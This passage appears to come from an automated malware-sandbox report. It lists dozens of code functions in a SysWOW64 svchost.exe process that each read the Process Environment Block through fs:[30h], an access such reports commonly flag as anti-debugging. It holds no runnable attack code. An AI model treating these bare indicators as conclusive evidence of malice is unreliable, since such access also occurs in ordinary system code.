Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD437C mov eax, dword ptr fs:[00000030h]	10_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]	10_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]	10_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]	10_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]	10_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB035C mov ecx, dword ptr fs:[00000030h]	10_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]	10_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]	10_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFA352 mov eax, dword ptr fs:[00000030h]	10_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD8350 mov ecx, dword ptr fs:[00000030h]	10_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A402A0 mov eax, dword ptr fs:[00000030h]	10_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A402A0 mov eax, dword ptr fs:[00000030h]	10_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	10_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]	10_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	10_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	10_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	10_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	10_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E284 mov eax, dword ptr fs:[00000030h]	10_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E284 mov eax, dword ptr fs:[00000030h]	10_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB0283 mov eax, dword ptr fs:[00000030h]	10_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB0283 mov eax, dword ptr fs:[00000030h]	10_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB0283 mov eax, dword ptr fs:[00000030h]	10_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A402E1 mov eax, dword ptr fs:[00000030h]	10_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A402E1 mov eax, dword ptr fs:[00000030h]	10_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A402E1 mov eax, dword ptr fs:[00000030h]	10_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	10_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	10_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	10_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	10_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	10_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2823B mov eax, dword ptr fs:[00000030h]	10_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A34260 mov eax, dword ptr fs:[00000030h]	10_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A34260 mov eax, dword ptr fs:[00000030h]	10_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A34260 mov eax, dword ptr fs:[00000030h]	10_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2826B mov eax, dword ptr fs:[00000030h]	10_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB8243 mov eax, dword ptr fs:[00000030h]	10_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB8243 mov ecx, dword ptr fs:[00000030h]	10_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2A250 mov eax, dword ptr fs:[00000030h]	10_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36259 mov eax, dword ptr fs:[00000030h]	10_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A70185 mov eax, dword ptr fs:[00000030h]	10_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AEC188 mov eax, dword ptr fs:[00000030h]	10_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AEC188 mov eax, dword ptr fs:[00000030h]	10_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD4180 mov eax, dword ptr fs:[00000030h]	10_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD4180 mov eax, dword ptr fs:[00000030h]	10_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]	10_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]	10_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]	10_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]	10_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2A197 mov eax, dword ptr fs:[00000030h]	10_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2A197 mov eax, dword ptr fs:[00000030h]	10_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2A197 mov eax, dword ptr fs:[00000030h]	10_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B061E5 mov eax, dword ptr fs:[00000030h]	10_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A601F8 mov eax, dword ptr fs:[00000030h]	10_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	10_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	10_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	10_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	10_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]	10_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	10_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	10_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A60124 mov eax, dword ptr fs:[00000030h]	10_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADA118 mov ecx, dword ptr fs:[00000030h]	10_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADA118 mov eax, dword ptr fs:[00000030h]	10_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADA118 mov eax, dword ptr fs:[00000030h]	10_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADA118 mov eax, dword ptr fs:[00000030h]	10_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF0115 mov eax, dword ptr fs:[00000030h]	10_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]	10_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]	10_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC4144 mov ecx, dword ptr fs:[00000030h]	10_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]	10_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]	10_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2C156 mov eax, dword ptr fs:[00000030h]	10_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC8158 mov eax, dword ptr fs:[00000030h]	10_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36154 mov eax, dword ptr fs:[00000030h]	10_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36154 mov eax, dword ptr fs:[00000030h]	10_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC80A8 mov eax, dword ptr fs:[00000030h]	10_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF60B8 mov eax, dword ptr fs:[00000030h]	10_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]	10_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3208A mov eax, dword ptr fs:[00000030h]	10_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]	10_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A380E9 mov eax, dword ptr fs:[00000030h]	10_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB60E0 mov eax, dword ptr fs:[00000030h]	10_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]	10_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A720F0 mov ecx, dword ptr fs:[00000030h]	10_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB20DE mov eax, dword ptr fs:[00000030h]	10_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2A020 mov eax, dword ptr fs:[00000030h]	10_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2C020 mov eax, dword ptr fs:[00000030h]	10_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC6030 mov eax, dword ptr fs:[00000030h]	10_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB4000 mov ecx, dword ptr fs:[00000030h]	10_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]	10_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]	10_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]	10_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]	10_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5C073 mov eax, dword ptr fs:[00000030h]	10_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32050 mov eax, dword ptr fs:[00000030h]	10_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6050 mov eax, dword ptr fs:[00000030h]	10_2_03AB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A307AF mov eax, dword ptr fs:[00000030h]	10_2_03A307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD678E mov eax, dword ptr fs:[00000030h]	10_2_03AD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A527ED mov eax, dword ptr fs:[00000030h]	10_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A527ED mov eax, dword ptr fs:[00000030h]	10_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A527ED mov eax, dword ptr fs:[00000030h]	10_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]	10_2_03ABE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A347FB mov eax, dword ptr fs:[00000030h]	10_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A347FB mov eax, dword ptr fs:[00000030h]	10_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]	10_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB07C3 mov eax, dword ptr fs:[00000030h]	10_2_03AB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C720 mov eax, dword ptr fs:[00000030h]	10_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C720 mov eax, dword ptr fs:[00000030h]	10_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6273C mov eax, dword ptr fs:[00000030h]	10_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6273C mov ecx, dword ptr fs:[00000030h]	10_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6273C mov eax, dword ptr fs:[00000030h]	10_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAC730 mov eax, dword ptr fs:[00000030h]	10_2_03AAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C700 mov eax, dword ptr fs:[00000030h]	10_2_03A6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30710 mov eax, dword ptr fs:[00000030h]	10_2_03A30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A60710 mov eax, dword ptr fs:[00000030h]	10_2_03A60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38770 mov eax, dword ptr fs:[00000030h]	10_2_03A38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6674D mov esi, dword ptr fs:[00000030h]	10_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6674D mov eax, dword ptr fs:[00000030h]	10_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6674D mov eax, dword ptr fs:[00000030h]	10_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30750 mov eax, dword ptr fs:[00000030h]	10_2_03A30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABE75D mov eax, dword ptr fs:[00000030h]	10_2_03ABE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72750 mov eax, dword ptr fs:[00000030h]	10_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72750 mov eax, dword ptr fs:[00000030h]	10_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB4755 mov eax, dword ptr fs:[00000030h]	10_2_03AB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]	10_2_03A6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A666B0 mov eax, dword ptr fs:[00000030h]	10_2_03A666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A34690 mov eax, dword ptr fs:[00000030h]	10_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A34690 mov eax, dword ptr fs:[00000030h]	10_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	10_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	10_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	10_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	10_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	10_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	10_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]	10_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]	10_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E627 mov eax, dword ptr fs:[00000030h]	10_2_03A4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A66620 mov eax, dword ptr fs:[00000030h]	10_2_03A66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A68620 mov eax, dword ptr fs:[00000030h]	10_2_03A68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3262C mov eax, dword ptr fs:[00000030h]	10_2_03A3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE609 mov eax, dword ptr fs:[00000030h]	10_2_03AAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]	10_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]	10_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]	10_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]	10_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]	10_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]	10_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]	10_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72619 mov eax, dword ptr fs:[00000030h]	10_2_03A72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF866E mov eax, dword ptr fs:[00000030h]	10_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF866E mov eax, dword ptr fs:[00000030h]	10_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A660 mov eax, dword ptr fs:[00000030h]	10_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A660 mov eax, dword ptr fs:[00000030h]	10_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A62674 mov eax, dword ptr fs:[00000030h]	10_2_03A62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4C640 mov eax, dword ptr fs:[00000030h]	10_2_03A4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	10_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	10_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	10_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A545B1 mov eax, dword ptr fs:[00000030h]	10_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A545B1 mov eax, dword ptr fs:[00000030h]	10_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32582 mov eax, dword ptr fs:[00000030h]	10_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32582 mov ecx, dword ptr fs:[00000030h]	10_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A64588 mov eax, dword ptr fs:[00000030h]	10_2_03A64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E59C mov eax, dword ptr fs:[00000030h]	10_2_03A6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
